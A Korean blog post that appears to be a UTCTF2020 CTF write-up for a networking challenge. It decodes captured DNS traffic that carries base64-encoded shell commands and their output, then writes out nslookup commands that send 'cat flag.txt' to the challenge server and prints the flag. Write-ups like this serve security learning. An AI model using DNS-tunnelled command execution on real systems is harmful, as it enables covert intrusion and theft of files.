일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
Tags
- NewsClipping
- reversing
- x64dbg
- 리눅스
- Shadow 동아리
- Nop Slide
- SQL Injection
- buffer over flow
- ftz
- 어셈블리어
- writeup
- Python
- requests
- CodeEngn
- RITSEC CTF 2019
- BOF
- 웹해킹
- Linux
- Next.js
- PWN
- RITSEC
- webhacking
- ctf
- 버퍼오버플로우
- HackCTF
- 뉴스클리핑
- 리버싱
- 보안뉴스
- termux
- Hackerschool
Archives
- Today
- Total
Jaeseo's Information Security Story
UTCTF2020 - [NETWORKING]Do-Not-Stop 본문
[NETWORKING]Do-Not-Stop
일단 문제 제목이 Do Not Stop 인 것을 보아 DNS
패킷에 대해 관심을 가져야 할 것 같습니다.
일단 패킷을 분석을 하면서 DNS 패킷을 분석 해본 결과 DNS Query를 통해 35.188.185.68에 base 64 형태로 Qeury를 전달하는 모습을 볼 수 있었습니다.
이때 응답값을 확인해보면
request 192.168.232.129 > 35.188.185.68 = d2hvYW1pCg== >> "whoami"
response 35.188.185.68 > 192.168.232.129 = cm9vdA== >> "root"
request 192.168.232.129 > 35.188.185.68 = bHMgLWxhCg== >> "ls -la"
response 35.188.185.68 > 192.168.232.129 =
dG90YWwgMjUxMgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IE1hciAgNiAwNDo0NCAuCmRyd3hyLXhyLXggICAgMSByb290ICAgICByb290ICAgICAgICAgIDQwOTYgTWFyICA2IDA4OjA5IC4uCi1ydy1yLS1yLS0gICAgMSByb290ICAgICByb290ICAgICAgICAgMTIyODggTWFyICA2IDA0OjQyIC5NYWtlZmlsZS5zd3AKLXJ3LXItLXItLSAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgIDEwNCBNYXIgIDUgMjM6NTAgRG9ja2VyZmlsZQotcnctci0tci0tICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICAgMTE5IE1hciAgNSAyMzo1MCBNYWtlZmlsZQotcnctci0tci0tICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICAgIDI4IE1hciAgNSAyMzo1MCBmbGFnLnR4dAotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAyNTMzODIzIE1hciAgNiAwNDo0NCBzZXJ2ZXIKLXJ3LXItLXItLSAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgMTY5MyBNYXIgIDUgMjM6NTAgc2VydmVyLmdv
\>> "total 2512
drwxr-xr-x 1 root root 4096 Mar 6 04:44 .
drwxr-xr-x 1 root root 4096 Mar 6 08:09 ..
\-rw-r--r-- 1 root root 12288 Mar 6 04:42 .Makefile.swp
\-rw-r--r-- 1 root root 104 Mar 5 23:50 Dockerfile
\-rw-r--r-- 1 root root 119 Mar 5 23:50 Makefile
\-rw-r--r-- 1 root root 28 Mar 5 23:50 flag.txt
\-rwxr-xr-x 1 root root 2533823 Mar 6 04:44 server
\-rw-r--r-- 1 root root 1693 Mar 5 23:50 server.go"
DNS 쿼리를 이용하여 원격코드 실행을 하는 모습을 볼 수 있었습니다.
위 내용을 바탕으로 flag.txt
의 내용을 확인 하는 payload를 전송 하기위해 아래처럼 내용을 작성 했습니다.
cat flag.txt >> "Y2F0IGZsYWcudHh0"
nslookup -type=TXT Y2F0IGZsYWcudHh0 35.188.185.68
이렇게 35.188.185.68 에 Query를 하면 응답이 없는 모습을 볼 수 있는데
다시한번 DNS 패킷을 확인 해보면 35.225.16.21에 dns.google.com의 IP를 질의를 하고 그 IP에 payload를 전송 하는 모습을 볼 수 있습니다. IP 주소가 변경 되었을 것이라 예상을 하고 query를 날려 IP를 알아봅니다.
nslookup -type=A dns.google.com 35.225.16.21
그 결과 3.88.57.227
라고 나오는데 이제 이 주소에 payload를 전송 합니다.
nslookup -type=TXT Y2F0IGZsYWcudHh0 3.88.57.227
응답이 "dXRmbGFneyRhbDF5X3MzTDFTX3NFNF9kTiR9" 으로 오고 이것을 decoding 하면 FLAG가 보입니다.
utflag{$al1y_s3L1S_sE4_dN$}
'Write UP > UTCTF2020' 카테고리의 다른 글
UTCTF2020 - [NETWORKING]Nittaku-3-Star-Premium (0) | 2020.03.09 |
---|---|
UTCTF2020 - [WEB]Shrek-Fans-Only (0) | 2020.03.09 |
UTCTF2020 - [WEB] spooky-store (0) | 2020.03.09 |
Comments